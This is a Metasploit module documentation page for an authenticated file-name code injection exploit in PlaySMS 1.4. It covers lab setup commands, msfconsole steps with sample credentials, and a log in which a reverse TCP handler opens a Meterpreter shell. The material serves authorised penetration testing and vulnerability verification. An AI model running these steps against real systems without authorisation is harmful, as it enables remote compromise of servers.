ContextQMD
Back to Metasploit Framework

Playsms Filename Exec

documentation/modules/exploit/multi/http/playsms_filename_exec.md

6.4.1313.2 KB
Original Source

Description

This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044.

Verification Steps

Available at Exploit-DB

Vulnerable Application Installation Setup.

  1. Download Application : wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
  2. Extract : tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
  3. Move In WebDirectory : mv playsms-1.4/web/* /var/www/html/
  4. make config file: cp /var/www/html/config-dist.php /var/www/html/config.php
  5. Change Owner : chown -R www-data:www-data /var/www/html/
  6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
  7. Now Visit : http://localhost/

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/playsms_filename_exec
  4. Do: set rport <port>
  5. Do: set rhost <ip>
  6. Do: set targeturi SecreTSMSgatwayLogin
  7. Do: set username touhid
  8. Do: set password diana
  9. Do: check
[*] 10.22.1.10:80 The target appears to be vulnerable.
  1. Do: set lport <port>
  2. Do: set lhost <ip>
  3. Do: exploit
  4. You should get a shell.

Scenarios

Playsms on Ubuntu Linux

msf exploit(multi/http/playsms_filename_exec) > run                                                                                    
                                                                                                                                       
[*] Started reverse TCP handler on 10.22.1.3:4444                                                                                      
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2                                                                          
[*] Trying to Login ......                                                                                                             
[+] Authentication successful : [ touhid:diana ]                                                                                       
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc                                                                         
[*] Trying to upload file with malicious Filename Field....                                                                            
[*] Sending stage (37775 bytes) to 10.22.1.15                                                                                          
[*] Sleeping before handling stage...                                                                                                  
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530                                     
                                                                                                                                       
meterpreter >